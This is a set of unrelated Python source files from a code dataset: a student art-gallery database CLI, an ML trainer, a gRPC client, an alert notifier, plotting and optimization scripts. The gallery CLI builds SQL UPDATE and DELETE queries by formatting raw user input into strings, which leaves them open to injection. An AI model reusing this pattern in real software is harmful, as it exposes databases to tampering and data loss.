\"))\n searchTable = permissiveTables[(userSearch-1)]\n except Exception as err:\n print(\"Number must be in the range.\")\n option4(db_object)\n columns = db_object.get_column_names(searchTable)\n\n fieldList = []\n valueList = []\n #display fields for input values \n print(\"Fields in this Table: \")\n for column in columns:\n print(column[0])\n fieldList.append(column[0])\n valueList.append(input(\"Input value:\"))\n\n\n fieldTuple = tuple(fieldList)\n valueTuple = tuple(valueList)\n #insert values into table\n try:\n db_object.insert(table=searchTable,attributes=fieldTuple,values=valueTuple)\n except Exception as err:\n print(\"Add error occurred: Make sure all field values are correct\")\n #searched = db_object.select(query=\"\"\"SELECT * FROM {} WHERE {} = '{}'\"\"\".format(permissiveTables[(userSearch-1)],fieldSearch,valueSearch))\n #print(searched)\n\n#get a comma seperate string of table fields from user\ndef get_update_fields():\n attributes_str= input(\"Enter field names seperate by comma: \")\n valuesStr= input(\"Enter values in same order: \")\n\n if \",\" in attributes_str: # multiple attributes\n attributes = attributes_str.split(\",\")\n values = valuesStr.split(\",\")\n else: # one attribute\n attributes = attributes_str\n values = valuesStr\n setState=\"\"\"{} = '{}'\"\"\".format(attributes,values)\n return setState\n\n counter = 0;\n setState=[]\n try:\n for attribute in attributes:\n setState.append(\"\"\"{} = '{}'\"\"\".format(attribute,values[counter]))\n counter=counter+1;\n setStateStr=\", \".join(setState)\n \n return setStateStr\n except Exception as err:\n print(\"Input Fields incorrect\")\n\n #get a comma seperate string of conditions from user\n\ndef get_condition_fields():\n attributes_str= input(\"Enter field names seperate by comma: \")\n valuesStr= input(\"Enter values in same order: \")\n\n if \",\" in attributes_str: # multiple attributes\n attributes = attributes_str.split(\",\")\n values = valuesStr.split(\",\")\n else: # one attribute\n attributes = attributes_str\n values = valuesStr\n setState=\"\"\"{} ='{}'\"\"\".format(attributes,values)\n return setState\n\n \n counter = 0;\n setState=[]\n try:\n for attribute in attributes:\n setState.append(\"\"\"{} = '{}'\"\"\".format(attribute,values[counter]))\n counter=counter+1;\n setStateStr=\" AND \".join(setState)\n \n return setStateStr\n except Exception as err:\n print(\"Input Fields incorrect\")\n\n\n#Update the value of a row in a table\ndef option5(db_object):\n now = datetime.now()\n expire = now.strftime('%Y-%m-%d %H:%M:%S')\n try:\n #create query for current session\n query= \"\"\"SELECT userSessionId FROM session WHERE expires > '{}'\"\"\".format(expire)\n\n #query sessoions for current userId\n userId=db_object.select(query=query)\n #if query is empty no one is signed in\n if userId==():\n print(\"You're Not Logged In\")\n option2(db_object)\n option5(db_object)\n #get account type \n userId1=userId[0]\n userId2=str(userId1[0])\n acctTypeQuery=\"\"\"SELECT acctType FROM Account WHERE userId = '{}'\"\"\".format(userId2)\n userAcctType= db_object.select(query=acctTypeQuery)\n acctId1=userAcctType[0]\n acctId2=str(acctId1[0])\n\n #get the tables that the account has Write access to\n featureQuery=\"\"\"SELECT feature FROM accountFeatures WHERE accountType = '{}'\"\"\".format(acctId2)\n featureId=db_object.select(query=featureQuery)\n\n tableList=[]\n tables=[]\n permissiveTables=[]\n\n for feature in featureId:\n tableList.append(feature[0])\n \n for tabled in tableList:\n 
tables.append(db_object.select(query=\"\"\"SELECT tables FROM feature WHERE featureId = '{}' AND permission = 'Write'\"\"\".format(str(tabled))))\n        \n        for tabs in tables:\n            for t in tabs:\n                if t[0]!= ():\n                    permissiveTables.append(t[0])\n        #display tables\n        print(\"Tables with Write Permission\")\n        if permissiveTables == []:\n            print(\"You Dont have that permission\")\n            return\n        count=0\n        for search in permissiveTables:\n            print(\"\"\"{}. {}\"\"\".format((count+1),search ))\n            count=count+1\n    except Exception as err:\n        print(err)\n\n    #get table that user is updating and display its fields\n    try:\n        userSearch= int(input(\"Type the number of the table you would like to update: \"))\n        searchTable = permissiveTables[(userSearch-1)]\n        columns = db_object.get_column_names(searchTable)\n        print(\"Fields in this Table: \")\n        for column in columns:\n            print(column[0])\n    except Exception as err:\n        print(\"Number must be in the range.\")\n        option5(db_object)\n\n    #get condition and values for the updated table\n    print(\"Which rows do you want to change? \")\n    conditionsQuery= get_condition_fields()\n    print(conditionsQuery)\n    print(\"What values do you want to add?\")\n    updateQuery= get_update_fields()\n    upQuery=\"\"\"UPDATE {} SET {} WHERE {}\"\"\".format(searchTable,updateQuery,conditionsQuery)\n    print(upQuery)\n    \n    #update values\n    try:\n        db_object.update(query=upQuery)\n        print(\"Update Successful\")\n        return\n    except Exception as err:\n        print(err)\n        return\n    #searched = db_object.select(query=\"\"\"SELECT * FROM {} WHERE {} = '{}'\"\"\".format(permissiveTables[(userSearch-1)],fieldSearch,valueSearch))\n    #print(searched)\n\n#Delete a row from a table based on search criteria\ndef option6(db_object):\n    now = datetime.now()\n    expire = now.strftime('%Y-%m-%d %H:%M:%S')\n    try:\n        #create query for current session\n        query= \"\"\"SELECT userSessionId FROM session WHERE expires > '{}'\"\"\".format(expire)\n\n        #query sessions for current userId\n        userId=db_object.select(query=query)\n\n        #if query is empty no one is signed in\n        if userId==():\n            print(\"You're Not Logged In\")\n            option2(db_object)\n            option6(db_object)\n            return\n        #get the accountType of the logged in user\n        userId1=userId[0]\n        userId2=str(userId1[0])\n        acctTypeQuery=\"\"\"SELECT acctType FROM Account WHERE userId = '{}'\"\"\".format(userId2)\n        userAcctType= db_object.select(query=acctTypeQuery)\n        acctId1=userAcctType[0]\n        acctId2=str(acctId1[0])\n        #get tables with Write access\n        featureQuery=\"\"\"SELECT feature FROM accountFeatures WHERE accountType = '{}'\"\"\".format(acctId2)\n        featureId=db_object.select(query=featureQuery)\n\n        tableList=[]\n        tables=[]\n        #show tables available to delete\n        permissiveTables=[]\n        for feature in featureId:\n            tableList.append(feature[0])\n        \n        for tabled in tableList:\n            tables.append(db_object.select(query=\"\"\"SELECT tables FROM feature WHERE featureId = '{}' AND permission = 'Write'\"\"\".format(str(tabled))))\n\n        for tabs in tables:\n            for t in tabs:\n                if t[0]!= ():\n                    permissiveTables.append(t[0])\n        print(\"Tables with Write Permission\")\n        if permissiveTables == []:\n            print(\"You Dont have that permission\")\n            return\n    except Exception as err:\n        print(err)\n\n    count=0\n    for search in permissiveTables:\n        print(\"\"\"{}. {}\"\"\".format((count+1),search ))\n        count=count+1\n    #get target table for deleting\n    try:\n        userSearch= int(input(\"Type the number of the table you would like to delete from? 
\"))\n searchTable = permissiveTables[(userSearch-1)]\n except Exception as err:\n print(\"Number must be in the range.\")\n option6(db_object)\n columns = db_object.get_column_names(searchTable)\n\n fieldList = []\n valueList = []\n #display fields \n print(\"Fields in this Table: \")\n for column in columns:\n print(column[0])\n\n #get conditions for the delete\n print(\"Which rows do you want to delete? \")\n conditionsQuery= get_condition_fields()\n \n deleteQuery=\"\"\"DELETE FROM {} WHERE {}\"\"\".format(searchTable,conditionsQuery)\n print(deleteQuery)\n \n\n try:\n\n db_object.delete(query=deleteQuery)\n print(\"Delete Successful\")\n except Exception as err:\n print(err)\n return\n return\n\n\n####Driver Program.....\n\nfrom database import DB\n\nprint(\"Setting up the database.......\\n\")\n\ndb = DB(config_file=\"sqlconfig.conf.py\")\n\n\ndatabase= \"ArtGalleryManagementDB\"\n\nif db.create_database(database=database, drop_database_first=True):\n print(\"Created database{}\".format(database))\nelse:\n print(\"An error occurred while creating database {} \".format(database))\n\ndb.run_sql_file(\"databasemodel.sql\")\n\n#insert sample data from insert.sql\ndb.run_sql_file(\"inserts.sql\")\n\nprint(\"\\nDone Setting Up\")\ntempUserID=find_id_number(db,\"User\",\"userid\")\n\n\n#option1(db,tempUserID)\n#option2(db)\n#option3(db)\n#option4(db\n\nshow_menu()\noption = int(input(\"Select one option from the menu: \"))\n#db._execute_query(query=\"INSERT INTO session ( sessionId, userSessionId, expires ) VALUES ( 25, 5, 2020-08-06 02:40:35 )\",values=())\nwhile option != 7:\n if option == 1:\n option1(db) # create your account\n elif option == 2:\n option2(db)\n elif option == 3:\n option3(db)\n elif option == 4:\n option4(db)\n elif option == 5:\n option5(db)\n elif option == 6:\n option6(db)\n\n\n show_menu()\n option = int(input(\"Select one option from the menu: \"))\n\n\n\n","sub_path":"CSC675FinalProject/python_mysql.py","file_name":"python_mysql.py","file_ext":"py","file_size_in_byte":17312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"212588983","text":"from design_baselines.utils import spearman\nfrom design_baselines.utils import perturb\nimport tensorflow as tf\nimport numpy as np\nimport random\n\nclass Trainer(tf.Module):\n def __init__(\n self,\n model,\n model_opt,\n ema_model,\n ema_rate,\n perturb_fn,\n is_discrete,\n sol_x,\n sol_x_opt,\n sol_x_eps,\n coef_pessimism,\n coef_stddev,\n ):\n\n super().__init__()\n self.model = model\n self.model_opt = model_opt\n self.ema_model = ema_model\n self.ema_rate = ema_rate\n self.perturb_fn = perturb_fn\n self.is_discrete = is_discrete\n self.init_sol_x = sol_x\n self.sol_x = tf.Variable(sol_x)\n self.sol_x_opt = sol_x_opt\n self.sol_x_eps = sol_x_eps\n self.coef_pessimism = coef_pessimism\n self.coef_stddev = coef_stddev\n self.sol_x_samples = tf.shape(self.sol_x)[0]\n\n def get_sol_x(self):\n return self.sol_x.read_value()\n\n @tf.function(experimental_relax_shapes=True)\n def train_step(self, x, y):\n x = self.perturb_fn(x)\n\n with tf.GradientTape() as tape:\n d = self.model.get_distribution(x, training=True)\n loss_nll = -d.log_prob(y)\n rank_correlation = spearman(y[:, 0], d.mean()[:, 0])\n\n with tf.GradientTape() as inner_tape:\n inner_tape.watch(self.sol_x)\n inp = tf.math.softmax(self.sol_x) if self.is_discrete else self.sol_x\n sol_d = self.model.get_distribution(inp, training=True)\n loss_sol_x = sol_d.mean() - self.coef_stddev * 
tf.math.log(sol_d.stddev())\n\n sol_x_grad = inner_tape.gradient(loss_sol_x, self.sol_x)\n sol_neg_x = self.sol_x + self.sol_x_eps * sol_x_grad\n inp = tf.math.softmax(sol_neg_x) if self.is_discrete else sol_neg_x\n sol_neg_d = self.model.get_distribution(inp, training=True)\n loss_sol_neg_x = sol_neg_d.mean() - self.coef_stddev * tf.math.log(sol_neg_d.stddev())\n\n loss_pessimism = ((loss_sol_x - loss_sol_neg_x) / self.sol_x_eps) ** 2\n loss_total = (\n tf.reduce_mean(loss_nll) + self.coef_pessimism * tf.reduce_mean(loss_pessimism)\n )\n\n # take gradient steps on the model\n grads = tape.gradient(loss_total, self.model.trainable_variables)\n grads = [tf.clip_by_norm(grad, 1.0) for grad in grads]\n self.model_opt.apply_gradients(zip(grads, self.model.trainable_variables))\n\n for var, ema_var in zip(self.model.trainable_variables, self.ema_model.trainable_variables):\n ema_var.assign(self.ema_rate * ema_var + (1 - self.ema_rate) * var)\n\n sol_x_grad_norm = tf.norm(tf.reshape(sol_x_grad, [self.sol_x_samples, -1]), axis=1)\n\n statistics = dict()\n statistics[\"loss/nll\"] = loss_nll\n statistics[\"loss/pessimism\"] = loss_pessimism\n statistics[\"loss/total\"] = loss_total\n statistics[\"sol_x_grad_norm\"] = tf.reduce_mean(sol_x_grad_norm)\n statistics[\"mean\"] = tf.reduce_mean(d.mean())\n statistics[\"stddev\"] = tf.reduce_mean(d.stddev())\n statistics[\"rank_corr\"] = rank_correlation\n\n return statistics\n\n @tf.function(experimental_relax_shapes=True)\n def validate_step(self, x, y):\n d = self.ema_model.get_distribution(x, training=True)\n loss_nll = -tf.reduce_mean(d.log_prob(y))\n rank_correlation = spearman(y[:, 0], d.mean()[:, 0])\n loss_total = loss_nll\n\n statistics = dict()\n statistics[\"loss/nll\"] = loss_nll\n statistics[\"loss/total\"] = loss_total\n statistics[\"mean\"] = tf.reduce_mean(d.mean())\n statistics[\"stddev\"] = tf.reduce_mean(d.stddev())\n statistics[\"rank_corr\"] = rank_correlation\n\n return statistics\n\n @tf.function(experimental_relax_shapes=True)\n def update_step(self):\n with tf.GradientTape() as tape:\n tape.watch(self.sol_x)\n inp = tf.math.softmax(self.sol_x) if self.is_discrete else self.sol_x\n d = self.ema_model.get_distribution(inp, training=False)\n loss = -(d.mean() - self.coef_stddev * tf.math.log(d.stddev()))\n\n sol_x_grad = tape.gradient(loss, self.sol_x)\n sol_x_grad_norm = tf.norm(tf.reshape(sol_x_grad, [self.sol_x_samples, -1]), axis=1)\n sol_x_grad = tf.clip_by_norm(sol_x_grad, 1.0)\n self.sol_x_opt.apply_gradients([[sol_x_grad, self.sol_x]])\n\n travelled = tf.linalg.norm(self.sol_x - self.init_sol_x) / tf.cast(\n tf.shape(self.sol_x)[0], dtype=tf.float32\n )\n\n statistics = dict()\n statistics[\"loss\"] = tf.reduce_mean(loss)\n statistics[\"mean\"] = tf.reduce_mean(d.mean())\n statistics[\"log_stddev\"] = tf.reduce_mean(tf.math.log(d.stddev()))\n statistics[\"travelled\"] = travelled\n statistics[\"sol_x_grad_norm\"] = tf.reduce_mean(sol_x_grad_norm)\n\n return statistics","sub_path":"design_baselines/fastgradpess/trainers.py","file_name":"trainers.py","file_ext":"py","file_size_in_byte":4977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"286513207","text":"import grpc\nfrom .protofiles.imagedata_pb2 import ImageData\nfrom .protofiles.imagedata_pb2_grpc import PredictorStub\nfrom experiments.utils import get_one_image\nimport numpy as np\n\n\ndef init(config):\n img, init.img_class = get_one_image(transpose=(2, 0, 1))\n imgdata = ImageData()\n # protobuf assumes the shape 
of the image is (1, 3, height, width)\n # where 1 is the batchsize and 3 is number of channels\n imgdata.image = img.tobytes()\n imgdata.height = img.shape[2]\n imgdata.width = img.shape[3]\n imgdata.dtype = img.dtype.name\n init.image = imgdata\n channel = grpc.insecure_channel('localhost:50051')\n init.stub = PredictorStub(channel)\n\n\ndef run(config, reporter):\n init(config)\n with reporter:\n generator = reporter.run(config['exp_count'], init.stub.GetPrediction, init.image)\n for output in generator:\n assert len(output.output) == 1000\n assert np.argmax(output.output) == init.img_class\n","sub_path":"experiments/_pytorch/_grpc_server/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"360771344","text":"# -*- coding: utf-8 -*-\nimport json\nimport logging\nimport time\nimport asyncio\n\nfrom aiohttp import ClientError\nfrom urllib.parse import urljoin, urlencode\nfrom datetime import datetime, timedelta\n\nfrom alamo_worker.conf import settings\nfrom alamo_worker.http_client import HttpClient\n\nlogger = logging.getLogger(__name__)\n\n\nclass HttpNotificationClient(object):\n _timeout = 30\n _retries = 3\n _delay = 5\n\n def __init__(self):\n assert getattr(settings, 'ALAMO_HTTP_NOTIFICATION_URL', None), (\n '`{}` could not be used since `ALAMO_HTTP_NOTIFICATION_URL` '\n 'is missing in `{}`.'.format(self.__class__.__name__, settings)\n )\n self._http = HttpClient(self._timeout)\n\n def merged_tags(self, check, trigger):\n \"\"\"Merges tags in check.tags and trigger.tags\n\n :param check: dict containing check definition\n :param trigger: dict containing trigger definition\n\n :rtype: list\n :return: list of unique tags\n \"\"\"\n return list(set(check.tags + trigger.tags))\n\n async def send(self, check, trigger, event_type):\n logger.info(\n 'Sending alert `%s` for check id=`%s`', event_type, check.id\n )\n\n payload = self.build_data(check, trigger, event_type)\n await self.make_request(check, payload, event_type)\n\n def get_links(self, check_uuid, trigger):\n links = {name: dict(type=link.type, href=link.href)\n for name, link in trigger.meta.links}\n\n timestamp = datetime.utcnow()\n results_start = timestamp + timedelta(\n minutes=settings.RESULT_RANGE_START\n )\n results_end = timestamp + timedelta(\n minutes=settings.RESULT_RANGE_END\n )\n\n links['alamo_api_url'] = dict(\n type='link',\n href='{}?{}'.format(\n urljoin(settings.ALAMO_URL, '/checks/{}/'.format(check_uuid)),\n urlencode([\n ('triggers', trigger.uuid),\n ('from', results_start.strftime('%Y-%m-%dT%H:%M:%SZ')),\n ('until', results_end.strftime('%Y-%m-%dT%H:%M:%SZ')),\n ])\n )\n )\n\n return links\n\n def _get_failed_metrics(self, trigger):\n failed_metrics = trigger.meta.failed_metrics\n return failed_metrics.as_dict() if failed_metrics else None\n\n def build_data(self, check, trigger, event_type):\n ignored = ('enabled', 'id', 'name', 'tags', 'severity', 'result',\n 'meta', 'url', 'uuid',)\n created = time.mktime(datetime.now().timetuple())\n event = dict(\n integration_key=check.integration_key,\n event_type=event_type,\n client=settings.ALAMO_CLIENT_NAME,\n client_url=trigger.url,\n message=trigger.result.message or '{}: OK'.format(trigger.name),\n created=created,\n payload=dict(\n check_name=check.name,\n uuid=check.uuid,\n check_uuid=check.uuid,\n entity_id=check.entity_id,\n entity_name=check.entity_name,\n trigger_name=trigger.name,\n trigger_uuid=trigger.uuid,\n 
eventid=trigger.uuid,\n severity=trigger.severity,\n # TODO(pavlo): reaction could be dropped\n reaction=check.reaction,\n service=check.service_name,\n service_id=check.service_id,\n target=trigger.target,\n environment=check.environment,\n type=check.type,\n tags=self.merged_tags(check, trigger),\n links=self.get_links(check.uuid, trigger),\n failed_metrics=self._get_failed_metrics(trigger),\n )\n )\n event['payload'].update({k: v for k, v in check.fields})\n event['payload'].update({k: v for k, v in trigger if k not in ignored})\n # FIXME(pavlo): need to reorganize rule matching in AER when multiple\n # FIXME: sources will be officially supported (fields overriding...)\n for source in check.sources:\n for _field, _value in source:\n if _field in ('name', 'type'):\n continue\n event['payload'][_field] = _value\n return event\n\n async def make_request(self, check, payload, event_type):\n headers = {\n 'content-type': 'application/json'\n }\n extra = {\n 'check_id': check.id,\n 'event_type': event_type,\n 'notification_type': 'http',\n }\n for i in range(self._retries):\n try:\n response = await self._http.request(\n 'post',\n settings.ALAMO_HTTP_NOTIFICATION_URL,\n check=check,\n data=json.dumps(payload),\n raise_for_status=True,\n headers=headers,\n )\n data = await response.json()\n except (ValueError, TimeoutError, ConnectionError, ClientError) as e: # noqa\n logger.exception(\n \"Failed to send result for check `%s`, \"\n \"error was: %s, retry %s out of %s...\",\n check.id, e, i + 1, self._retries, extra=extra)\n await asyncio.sleep(self._delay)\n else:\n break\n else:\n logger.error(\"Failed to send result for check `%s`\", check.id,\n extra=extra)\n return\n\n event_id, integration_key, date_key = (\n data.get('event_id'), data.get('integration_key'),\n data.get('date_key')\n )\n extra.update({\n 'event_id': event_id,\n 'integration_key': integration_key,\n 'date_key': date_key,\n })\n logger.info(\n '`%s` event with id `%s` '\n 'successfully created for integration key `%s`',\n event_type, event_id, integration_key, extra=extra\n )\n","sub_path":"alamo_worker/alerter/notifications/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":6079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"446018384","text":"#-------------------------------------------------------------------------------\n# Name: python94\n# Purpose:\n#\n# Author: Jean\n#\n# Created: 17/08/2018\n# Copyright: (c) Jean 2018\n# Licence: \n#-------------------------------------------------------------------------------\nimport numpy as np\nimport pylab as pl\n\ng1=0.75\nn=10\ne=2\ndebug=False\n\n\ndef grille(xmax,xmin,nx,ymin,ymax,ny,g1):\n X=np.linspace(xmin,xmax,nx)\n Y=np.linspace(ymin,ymax,ny)\n '''\n #trace un trait entre (0,ymin) et (0,ymax)\n pl.plot([0,0],[ymin,ymax],color='red') #idem segment(0,0,0,1)\n #trace un trait entre (1,ymin) et (1,ymax)\n pl.plot([1,1],[ymin,ymax],color='red') #idem segment(1,0,1,1)\n '''\n for k in range(0,nx):\n pl.plot([X[k],X[k]],[ymin,ymax],color=str(g1))\n for k in range(0,ny):\n pl.plot([xmin,xmax],[Y[k],Y[k]],color=str(g1))\n if debug:\n pl.show()\n pl.close()\n\n\ndef segment(x1,y1,x2,y2,c='red',e=3):\n pl.plot([x1,x2],[y1,y2],color=c,lw=e)\n if debug:\n pl.show()\n pl.close()\n\ndef tranlater(x,y,u,v):\n return (x+u,y+v)\n\ndef rectangle(x,y,u,v,L1,L2,d,c='green',e=3):\n if d=='d':\n i=1j\n else:\n i=-1j\n\n r=(u**2+v**2)**(1/2)\n u1,v1=u/r,v/r\n z1=x+y*1j\n z2=(x+L1*u1)+(y+L1*v1)*1j\n 
z3=z2-(z1-z2)*i*L2/L1\n z4=z1+(z2-z1)*i*L2/L1\n\n Z=[z1,z2,z3,z4,z1]\n X=np.real(Z)\n Y=np.imag(Z)\n\n pl.plot(X,Y,color=c,lw=e)\n #show for test\n if debug:\n pl.show()\n pl.close()\n\ndef instruction(x,y,h):\n '''\n draws an instruction box\n x,y connection point\n h half-width\n returns the end point of the segment\n '''\n rectangle(x-h,y,1,0,2*h,h,'i','black',1.5)\n segment(x,y-h,x,y-2*h,'black',1.5)\n\n return (x,y-2*h)\n\ndef condition(x0,y0,h,cg,cd):\n lg=(2**(1/2)*h)\n rectangle(x0,y0,-1,-1,lg,lg,'d','black',1.5)\n #left segment in green\n x1,y1=tranlater(x0,y0,-h/2,-3*h/2)\n x3,y3=tranlater(x1,y1,-cg*h,-cg*h)\n segment(x1,y1,x3,y3,'green',1.5)\n #right segment in red\n x2,y2=tranlater(x0,y0,h/2,-3*h/2)\n x4,y4=tranlater(x2,y2,cd*h,-cd*h)\n segment(x2,y2,x4,y4,'red',1.5)\n\n return x3,y3,x4,y4\n\ndef test():\n global debug\n debug=True\n print(debug)\n grille(0,1,n,0,1,n,0.75)\n segment(0,0,0,1)\n rectangle(0,0,1,0,2,1,'d','black',1.5) #direct\n rectangle(0,0,1,0,2,1,'i','black',1.5) #indirect, clockwise\n debug=False\n print(debug)\n #draws the grid and an instruction box\n grille(0,1,n,0,1,n,g1)\n s1,s2=instruction(0.5,0.8,0.2)\n pl.show()\n pl.close()\n\ndef organigramme():\n #draws the grid and an instruction box\n grille(0,1,n,0,1,n,g1)\n h=0.1\n pl.title('Flowchart')\n x,y=instruction(0.5,0.95,h)\n a,b,c,d=condition(x,y,h,1,1)\n instruction(a,b,h)\n instruction(c,d,h)\n pl.show()\n pl.close()\n\n#test()\norganigramme()\n\ndef main():\n pass\n\nif __name__ == '__main__':\n main()\n","sub_path":"python94.py","file_name":"python94.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"465923103","text":"from tools.imports import *\nfrom config import settings\n\nintents = discord.Intents.all()\nprefix = '/'\n\nclient = commands.Bot(command_prefix=prefix, intents=intents)\nslash = SlashCommand(client, sync_commands=True)\n\nclient.remove_command('help')","sub_path":"tools/client_init.py","file_name":"client_init.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"290048990","text":"from datetime import datetime\n\nfrom .graph_writer import write_graph\n\nfrom ...bgp_as import BGPAS\nfrom ...simulator_engine import SimulatorEngine\n\n\n# tmp_path is a pytest fixture\ndef run_example(tmp_path,\n peers=list(),\n customer_providers=list(),\n as_types=dict(),\n as_classes_dict={0: BGPAS},\n announcements=list(),\n local_ribs=dict(),\n ):\n \"\"\"Runs an example\"\"\"\n\n path = tmp_path / \"example.tsv\"\n write_graph(peers, customer_providers, as_types, path)\n print(\"populating engine\")\n start = datetime.now()\n engine = SimulatorEngine(str(path), as_classes_dict)\n print((datetime.now()-start).total_seconds())\n print(\"Running engine\")\n start = datetime.now()\n engine.run(announcements, clear=False)\n input((datetime.now()-start).total_seconds())\n for as_obj in engine:\n print(\"ASN:\", as_obj.asn)\n for prefix, ann in as_obj.local_rib.items():\n print(ann)\n if local_ribs:\n as_obj.local_rib.assert_eq(local_ribs[as_obj.asn])\n","sub_path":"lib_bgp_simulator_engine/tests/utils/run_example.py","file_name":"run_example.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"181838583","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 15 18:33:38 2017\n\n@author:Ing. Bruno E. 
Chávez\nFlow optimization \n\"\"\"\n\nfrom scipy.optimize import *\nimport xlwings as xw\ndef run(hoja):\n sheet=xw.sheets[hoja]\n sheet.range(\"I4\").value=0\n sheet2=xw.sheets[\"Restricciones\"]\n def get_flows():\n '''Collects the unknowns of the imports into a list'''\n incog_lis=[[],[],[],[\"\",[]],[]] \n '''Description of incog_lis\n #0-> all unknowns, 1->Totals of the sums,\n #2->List with the number of unknowns in Imports and lng, \n #3-> 3[0]-->Status flag for whether LNG is a degree of freedom, 3[1]--> whether it is variable or fixed\n #4-> indices, 4[0]--> last index of the imp variables, 4[1]-->last index of the LNG variables'''\n \n j=0 #-> Counter for indices (incog_lis[4])\n \n #Imports data\n \n b=sheet.range(\"A11\").value\n i=11\n k=0\n while(b!=\"TOTAL\"):\n a=sheet.range(\"B\"+str(i)).value\n incog_lis[0].append(a)\n i+=1\n if a==\"x\":\n k+=1\n j+=1\n b=sheet.range(\"A\"+str(i)).value\n incog_lis[1].append(i)\n incog_lis[2].append(k)\n incog_lis[4].append(j)\n #LNG data \n b=sheet.range(\"M11\").value\n i=11\n k=0\n while(b!=\"TOTAL\"):\n a=sheet.range(\"N\"+str(i)).value\n incog_lis[0].append(a)\n i+=1\n if a==\"x\":\n incog_lis[3][1].append(\"yes\")\n k+=1\n else:\n incog_lis[3][1].append(\"no\")\n j+=1\n b=sheet.range(\"M\"+str(i)).value\n incog_lis[1].append(i)\n incog_lis[2].append(k)\n incog_lis[4].append(j)\n if incog_lis[2][1]==0:\n incog_lis[3][0]=False\n else:\n incog_lis[3][0]=True\n \n return incog_lis\n def get_incogs(incog,count,LNG_status,is_var,max_LNG=[]):\n '''builds the objective function to optimize from the unknowns in the imports\n incog type -> list\n LNG_status -> Whether lng is variable or fixed; if it is variable LNG_status=True.(incog[3][0])\n is_var-> list like [\"yes\",\"no\",\"yes\",..,\"no\"] of lng variables (incog[3][1])\n max_LNG -> maximum permissible LNG'''\n c=[]\n mults=[]\n for mult in max_LNG:\n a=mult/10\n mults.append(a)\n print(mults)\n if count==0 and LNG_status==True:\n k=0 #k -> counter for the is_var list\n for i in range(incog[4][0],incog[4][1]):\n if incog[0][i]==\"x\" and incog[3][1][k]==\"yes\":\n incog[0][i]=0\n k+=1 \n \n k=0\n j=0 #-> Counter for mults\n if count>0 and LNG_status==True: \n for i in range(incog[4][0],incog[4][1]):\n if incog[3][1][k]==\"yes\":\n incog[0][i]=mults[j]\n j+=1\n k+=1\n \n if count>1 and LNG_status==True:\n k=0\n for i in range(incog[4][0],incog[4][1]):\n if incog[3][1][k]==\"yes\":\n incog[0][i]=count*mults[k]\n k+=1\n for i in incog[0]:\n if i==\"x\":\n c.append(1)\n return c\n def optimizeflows(flows,count=-1,LNG_status=False):\n #Sets the bounds of the variables\n \n #Imports bounds\n k=4\n bound_lis_imp=[]\n for i in range(0,flows[4][0]):\n if flows[0][i]==\"x\":\n lower=sheet2.range(\"E\"+str(k)).value\n upper=sheet2.range(\"F\"+str(k)).value\n limits=[lower,upper]\n bound_lis_imp.append(limits)\n k+=1\n else:\n k+=1\n \n #LNG bounds\n \n if flows[3][0]==True:\n k=4\n bound_lis_LNG=[]\n max_LNG=[]\n for i in range(flows[4][0],flows[4][1]):\n lower=sheet2.range(\"K\"+str(k)).value\n upper=sheet2.range(\"L\"+str(k)).value\n limits=[lower,upper]\n bound_lis_LNG.append(limits)\n max_LNG.append(upper)\n k+=1\n \n if flows[3][0]==False:\n max_LNG=[]\n #converts bound_lis to a tuple\n \n bounds_tuple=tuple()\n for i in range(0,len(bound_lis_imp)):\n tup=(bound_lis_imp[i][0],bound_lis_imp[i][1])\n bounds_tuple+=(tup,)\n \n #MODIFIES THE LNG VALUES\n \n if flows[3][0]==True:\n c=get_incogs(flows,count,LNG_status,flows[3][1],max_LNG)\n else:\n c=get_incogs(flows,count,LNG_status,flows[3][1]) \n \n 
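#(Illustrative aside, not part of the original script) The block below feeds\n #scipy.optimize.linprog an all-ones objective c, one equality row\n #A_eq=[[1,...,1]] and b_eq=[Tot], so the solver only has to find a feasible\n #split of Tot within the bounds. A minimal sketch with made-up numbers:\n # res = linprog([1, 1], A_eq=[[1, 1]], b_eq=[10], bounds=((0, 8), (0, 8)))\n # res.x is then some feasible pair with res.x[0] + res.x[1] == 10.\n 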
#Gets the value that B must have\n \n Tot=sheet.range(\"k\"+str(4)).value\n Tot=float(Tot)\n for i in range(0,flows[4][0]):\n if flows[0][i]!=\"x\":\n Tot-=float(flows[0][i])\n if LNG_status==True and count>=1:\n k=0\n for i in range(flows[4][0],flows[4][1]):\n if flows[3][1][k]==\"yes\":\n Tot-=flows[0][i]\n k+=1\n else:\n k+=1\n #Builds the equation x1+x2+x3...+xn as coefficients 1+1+1+.....+1 \n B=[Tot]\n \n A=[[]]\n for i in c:\n A[0].append(1)\n \n #Calls the simplex-type linear solver\n res=linprog(c,A_eq=A,b_eq=B,bounds=bounds_tuple,options={\"disp\":True})\n return [res,max_LNG]\n\n\n#End of the function definitions, the subroutine begins \n\n flows=get_flows()\n total_flag=False\n if \"x\" in flows[0]:\n if flows[3][0]==True:\n flag=True\n count=0\n while(flag==True):\n res=optimizeflows(flows,count,True)\n \n if res[0].success==True:\n total_flag=True\n flag=False \n else:\n if count==10:\n flag=False\n sheet.range(\"I4\").value=1\n else:\n count+=1\n for i in range(flows[4][0],flows[4][1]):\n j=0\n if flows[3][1][j]==\"yes\" and flows[0][i]==res[1][j]:\n j+=1\n total_flag=False\n flag=False\n else:\n j+=1\n else:\n res=optimizeflows(flows)\n x_sols=res[0].x\n \n #Values from py to excel\n \n if flows[3][0]==True and total_flag==True:\n \n k=11\n j=0\n if res[0].success==True:\n \n #Imports values\n \n for i in range(0,flows[4][0]):\n if flows[0][i]==\"x\":\n sheet.range(\"B\"+str(k)).value=x_sols[j]\n k+=1\n j+=1\n else:\n k+=1\n \n #LNG values\n \n k=11 #-> Row number in 